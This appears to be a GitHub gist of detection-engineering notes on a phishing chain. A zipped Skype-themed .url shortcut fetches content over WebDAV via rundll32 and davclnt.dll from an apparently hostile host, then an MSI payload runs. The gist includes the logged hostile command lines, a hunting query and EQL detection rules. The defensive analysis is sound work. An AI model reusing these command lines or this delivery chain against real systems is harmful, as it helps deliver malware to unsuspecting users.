-
-
Save Samirbous/0b49ebcb82bfdf2638397a17047d2a01 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"process": { | |
"args": [ | |
"rundll32.exe", | |
"C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie", | |
"brukjanesis.com@80", | |
"http://brukjanesis.com/TrdGallery/ResultTrd.bmp.url" | |
], | |
C:\Program Files\WinRAR\WinRAR.exe | |
C:\Users\bouss\AppData\Local\Temp\Rar$DIa2832.411\Important Information Skype.url | |
C:\Windows\explorer.exe | |
C:\Users\bouss\AppData\Local\Temp\aa4160eb-4c4d-4406-8fab-54396122f4fd_Important Information Skype.zip.4fd\Important Information Skype.url | |
Download: aaaImageusci[1].msi | |
C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi | |
C:\Windows\explorer.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Program Files\WinRAR\WinRAR.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Windows\explorer.exe | |
ntdll.dll|kernelbase.dll|wininet.dll|shell32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll | |
C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi | |
C:\WINDOWS\Explorer.EXE | |
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\bouss\Downloads\Important Information Skype.zip" | |
"C:\WINDOWS\System32\msiexec.exe" /i "C:\Users\bouss\AppData\Local\Microsoft\Windows\INetCache\IE\6W5T5IQD\aaaImageusci[1].msi" | |
"ntdll.dll|kernelbase.dll|kernel32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll", | |
"ntdll.dll|kernelbase.dll|kernel32.dll|windows.storage.dll|shell32.dll|ieframe.dll|shell32.dll|ieframe.dll|shell32.dll|shcore.dll|kernel32.dll|ntdll.dll" | |
https://www.virustotal.com/gui/search/content%253A%2522%255BInternetShortcut%255D%2522%2520and%2520content%253A%2522URL%253Dfile%253A%252F%252F%2522%2520and%2520tag%253Ajavascript%2520and%2520content%253A%2522.url%2522 | |
PSA: Files executed via WebDAV are copied locally to C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV | |
process.thread.Ext.call_stack_summary : ntdll.dll|kernelbase.dll|webclnt.dll|kernel32.dll|ntdll.dll | |
C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient | |
sequence by host.id with maxspan=3m | |
[process where event.action == "start" and | |
process.parent.name : ("explorer.exe", "winrar.exe", "7zFM.exe") and | |
process.command_line : "*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*"] | |
[] | |
[file where event.action == "deletion" and process.name : "svchost.exe" and file.extension == "url" and | |
file.path : "?:\\WINDOWS\\*\\TfsStore\\Tfs_DAV\\{*}.url"] | |
sequence by host.id with maxspan=3m | |
[process where event.action == "start" and | |
process.parent.name : ("explorer.exe", "winrar.exe", "7zFM.exe") and | |
process.command_line : "*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*"] | |
[file where event.action == "deletion" and process.name : "svchost.exe" and file.extension == "url" and | |
file.path : "?:\\WINDOWS\\*\\TfsStore\\Tfs_DAV\\{*}.url"] | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment